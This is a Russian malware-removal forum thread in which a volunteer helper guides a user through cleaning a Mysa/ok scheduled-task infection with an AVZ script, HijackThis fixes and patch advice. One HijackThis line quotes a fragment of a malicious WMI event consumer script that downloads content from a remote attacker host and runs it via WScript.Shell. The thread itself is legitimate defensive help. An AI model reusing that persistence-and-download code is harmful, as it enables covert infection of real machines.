Показано с 1 по 10 из 10.

Mysa1,Mysa2,Mysa3,ok. [HEUR:Trojan.Win32.Generic ] (заявка № 217765)

  1. #1
    Junior Member Репутация
    Регистрация
    16.02.2018
    Сообщений
    8
    Вес репутации
    7

    Thumbs up Mysa1,Mysa2,Mysa3,ok. [HEUR:Trojan.Win32.Generic ]

    Здравствуйте, обнаружил по пути C:\Windows\system32\Tasks\ файлы Mysa1, Mysa2, Mysa3 и ok.
    И в диспетчере задач запущены taskgen.exe и rundll32.exe, хотя обычно их там нету.
    Cure it определяет и удаляет Mysa и ok файлы, но они восстанавливаются через несколько часов.

    Ситуация схожая с этой темой https://virusinfo.info/showthread.php?t=214520.

    Пробовал вручную удалить в реестре start и start1, но файлы всё равно восстановились.

    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,316
    Вес репутации
    354
    Уважаемый(ая) BubbaBubbs, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    16.02.2018
    Сообщений
    8
    Вес репутации
    7
    Wanna Cry апдейт установил. До создания темы и сбора данных Autologger'ом.

  5. #4
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    30,408
    Вес репутации
    925
    Выполните скрипт в AVZ:
    Код:
    begin
     TerminateProcessByName('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe');
     QuarantineFile('C:\ProgramData\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\attrib.tmp', '');
     QuarantineFile('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe', '');
     QuarantineFile('c:\windows\debug\item.dat', '');
     QuarantineFile('c:\windows\debug\ok.dat', '');
     QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
     DeleteFile('C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe', '32');
     DeleteFile('C:\ProgramData\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\attrib.tmp', '32');
     DeleteFile('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\errorcheck.exe', '32');
     DeleteFile('c:\windows\debug\item.dat', '32');
     DeleteFile('c:\windows\debug\ok.dat', '32');
     DeleteFile('C:\WINDOWS\mssecsvc.exe', '32');
     ExecuteFile('schtasks.exe', '/delete /TN "Macromedia\ErrorCheck" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
     DeleteService('mssecsvc2.0');
     DeleteFileMask('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys', '*', false);
     DeleteDirectory('c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys');
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 2, 2, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    Запустите HijackThis, расположенный в папке Autologger и пофикситеWindows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
    Код:
    O4 - MSConfig\startupreg: Akamai NetSession Interface [command] = C:\Users\Fess\AppData\Local\Akamai\netsession_win.exe  (file missing) (HKCU) (2015/04/02)
    O4 - MSConfig\startupreg: CCleaner Monitoring [command] = C:\Program Files\CCleaner\CCleaner64.exe /MONITOR (file missing) (HKCU) (2016/05/15)
    O4 - MSConfig\startupreg: SunJavaUpdateSched [command] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe  (file missing) (HKLM) (2016/05/15)
    O7 - IPSec: Name: win (2018/02/15) - {d3c099d8-eac8-4d71-9e95-905be0d96e63} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/15) - {d3c099d8-eac8-4d71-9e95-905be0d96e63} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/15) - {d3c099d8-eac8-4d71-9e95-905be0d96e63} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/15) - {d3c099d8-eac8-4d71-9e95-905be0d96e63} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)
    Сделайте новый лог Autologger.
    WBR,
    Vadim

  6. Это понравилось:


  7. #5
    Junior Member Репутация
    Регистрация
    16.02.2018
    Сообщений
    8
    Вес репутации
    7
    Выполнил. Карантин отправил.
    Вложения Вложения

  8. #6
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    30,408
    Вес репутации
    925
    Порядок.

    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim

  9. Это понравилось:


  10. #7
    Junior Member Репутация
    Регистрация
    16.02.2018
    Сообщений
    8
    Вес репутации
    7
    Готово.
    Вложения Вложения

  11. #8
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    30,408
    Вес репутации
    925
    Internet Explorer 10.0.9200.16521 Внимание! Скачать обновления
    ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
    Даже, если не используете IE - обновите.

    Контроль учётных записей пользователя отключен
    Запрос на повышение прав для администраторов отключен
    ^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
    Рекомендую ознакомиться со статьёй Так ли страшен контроль учетных записей (UAC)? и включить.

    Автоматическое обновление отключено

    HotFix KB3115858 Внимание! Скачать обновления
    HotFix KB3140735 Внимание! Скачать обновления
    HotFix KB3138910 Внимание! Скачать обновления
    HotFix KB3138962 Внимание! Скачать обновления
    HotFix KB3145739 Внимание! Скачать обновления
    HotFix KB3146963 Внимание! Скачать обновления
    HotFix KB3156013 Внимание! Скачать обновления
    HotFix KB3156016 Внимание! Скачать обновления
    HotFix KB3156019 Внимание! Скачать обновления
    HotFix KB3155178 Внимание! Скачать обновления
    HotFix KB3153171 Внимание! Скачать обновления
    HotFix KB3170455 Внимание! Скачать обновления
    HotFix KB3178034 Внимание! Скачать обновления
    HotFix KB3185911 Внимание! Скачать обновления
    HotFix KB3184122 Внимание! Скачать обновления
    HotFix KB3192391 Внимание! Скачать обновления
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления
    HotFix KB4056894 Внимание! Скачать обновления
    HotFix KB4056897 Внимание! Скачать обновления
    Установите, не дожидайтесь, когда через другую критическую уязвимость взломают.

    Java 8 Update 131 v.8.0.1310.11 Внимание! Скачать обновления
    ^Удалите старую версию и установите новую (jre-8u162-windows-i586.exe)^
    --------------------------- [ AdobeProduction ] ---------------------------
    Adobe AIR v.3.7.0.2090 Внимание! Скачать обновления
    Adobe Flash Player 28 ActiveX v.28.0.0.161
    Adobe Flash Player 28 NPAPI v.28.0.0.161
    Adobe Flash Player 28 PPAPI v.28.0.0.161
    ------------------------------- [ Browser ] -------------------------------
    Mozilla Firefox 56.0 (x86 ru) v.56.0 Внимание! Скачать обновления
    ^Проверьте обновления через меню Справка - О Firefox!^
    Opera Stable 49.0.2725.47 v.49.0.2725.47 Внимание! Скачать обновления
    ^Проверьте обновления через меню О программе!^
    Это тоже обновлять обязательно.
    WBR,
    Vadim

  12. Это понравилось:


  13. #9
    Junior Member Репутация
    Регистрация
    16.02.2018
    Сообщений
    8
    Вес репутации
    7
    Спасибо.

  14. #10
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,224
    Вес репутации
    960

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 1
    • В ходе лечения обнаружены вредоносные программы:
      1. c:\programdata\macromedia\flash player\macromedia.com\support\flashplayer\sys\erro rcheck.exe - HEUR:Trojan.Win32.Generic


  • Уважаемый(ая) BubbaBubbs, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Mysa1,Mysa,ok,Mysa2 и автозапуск
      От Desteeerslav в разделе Помогите!
      Ответов: 13
      Последнее сообщение: 14.08.2017, 11:24
    2. Ответов: 7
      Последнее сообщение: 07.08.2016, 14:12
    3. Ответов: 38
      Последнее сообщение: 03.08.2015, 11:24
    4. Ответов: 7
      Последнее сообщение: 22.07.2013, 19:29
    5. Ответов: 6
      Последнее сообщение: 15.06.2013, 13:20

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00194 seconds with 18 queries